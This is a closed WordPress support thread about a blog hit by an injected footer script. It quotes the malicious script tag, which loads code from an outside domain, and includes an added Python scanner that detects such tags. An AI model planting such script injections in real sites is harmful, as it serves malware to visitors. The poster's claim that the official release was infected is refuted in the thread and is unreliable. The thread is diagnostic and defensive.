
[closed] URGENT HELP! WP upgrade installed spam! (9 posts)

  1. creditcardforum
    Member
    Posted 2 years ago #

    I just upgraded WP on one of my blogs manually and it's installed a popup scam security ad on my blog! Please go to creditcardforum dot com /blog in Internet Explorer to see (doesn't do it in Firefox). Please help. How do I get rid of this?!

  2. creditcardforum
    Member
    Posted 2 years ago #

    </div> <!-- Footer div -->
    </div> <!-- Wrapper div -->
    
    <script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>
    </body>
    </html>

    That's what's in your footer! index.php, page.php, etc. are all infected with malicious code... I DOWNLOADED 2.9.2 DIRECTLY FROM WORDPRESS.ORG! Someone needs to stop this!

  3. creditcardforum
    Member
    Posted 2 years ago #

    Anyone home? This is urgent... I'm not talking about myself, but rather everyone else that is downloading these infected files from wordpress.org! I just restored my DB and files to pre-update. I'm going through the files downloaded from WordPress and these are so infected it's not even funny. Someone needs to pull the 2.9.2 corrupt files ASAP. I can't even imagine how many people are being affected by this and probably don't even know it.

  4. Saildude
    Member
    Posted 2 years ago #

    I just downloaded 2.9.2 and looked in index.php and page.php and did not see anything to match your code, my index file only has two real lines of code.

  5. James
    Happiness Engineer
    Posted 2 years ago #

    I just looked through the source of the index.php and page.php files from the Default and Classic themes and the main index.php file from WordPress 2.9.2. I see absolutely no reference to any sort of malware or the script tag that you posted. Are you sure the malware is not in your own theme or perhaps being added by a plugin?
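
Added example, not part of any post in this thread: a Python check for the kind of injection shown in post 2, listing every `<script src=...>` in theme or plugin templates that loads from a host outside an allowlist. The allowlist entry `example.com` and the sample footer are constructed for illustration; the function names are hypothetical.

```python
import os
import re
from urllib.parse import urlparse

# <script ... src=...> with double, single or no quotes; the tag may span lines.
SCRIPT_SRC = re.compile(r"<script\b[^>]*?\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.IGNORECASE)

def find_external_scripts(text, allowed_hosts):
    """Return (line, host, url) for each script tag loading from a host not in allowed_hosts."""
    hits = []
    for m in SCRIPT_SRC.finditer(text):
        url = m.group(1)
        try:
            host = urlparse(url).hostname  # None for relative paths and PHP-built values
        except ValueError:
            host = None
        if host and host not in allowed_hosts:
            line = text.count("\n", 0, m.start()) + 1
            hits.append((line, host, url))
    return hits

def scan_tree(root, allowed_hosts, exts=(".php", ".html", ".htm")):
    """Walk root and return {path: hits} for template files containing off-site scripts."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = find_external_scripts(fh.read(), allowed_hosts)
                if hits:
                    findings[path] = hits
    return findings

# Constructed sample: the footer fragment quoted in post 2, preceded by a
# same-site script line that must not be reported.
SAMPLE_FOOTER = """<script src="/wp-includes/js/jquery/jquery.js"></script>
</div> <!-- Footer div -->
</div> <!-- Wrapper div -->

<script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>
</body>
</html>
"""

if __name__ == "__main__":
    for line, host, url in find_external_scripts(SAMPLE_FOOTER, {"example.com"}):
        print(f"line {line}: script loaded from {host} ({url})")
```

Running `scan_tree` over both a fresh download and the live `wp-content` directory shows whether the tag came with the release or was written into the installed files afterwards.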

  6. James
    Happiness Engineer
    Posted 2 years ago #

    Looking at some earlier threads, I bet your blog is either hosted with GoDaddy or subject to the same vulnerability. See these for more info:

    http://wordpress.org/support/topic/391658

    http://codex.wordpress.org/FAQ_My_site_was_hacked

  7. songdogtech
    Member
    Posted 2 years ago #

    @creditcardforum: Google that URL string and read the hack reports. You on Network Solutions? :

    http://blog.sucuri.net/2010/05/second-round-of-godaddy-sites-hacked.html

    and

    http://blog.sucuri.net/2010/05/new-infections-today-at-network.html

  8. ClaytonJames
    Member
    Posted 2 years ago #

    @creditcardforum

    Your source code says you are currently using WordPress 2.6.

    <meta name="generator" content="WordPress 2.6" />

    I also noted you are running a potentially vulnerable version of vBulletin at your domain root.

    <meta name="generator" content="vBulletin 3.6.11" />

    I think I read somewhere quite a while back about some serious XSS vulnerabilities in version 3.6.11 (if left un-patched).

    Just some food for thought while analyzing how you may have gotten hacked.

    [edit] and I see you are indeed hosted by GoDaddy.

  9. Samuel B
    moderator
    Posted 2 years ago #

    closing this hysterical thread as bunk - posted twice, anyway

Topic Closed

This topic has been closed to new replies.
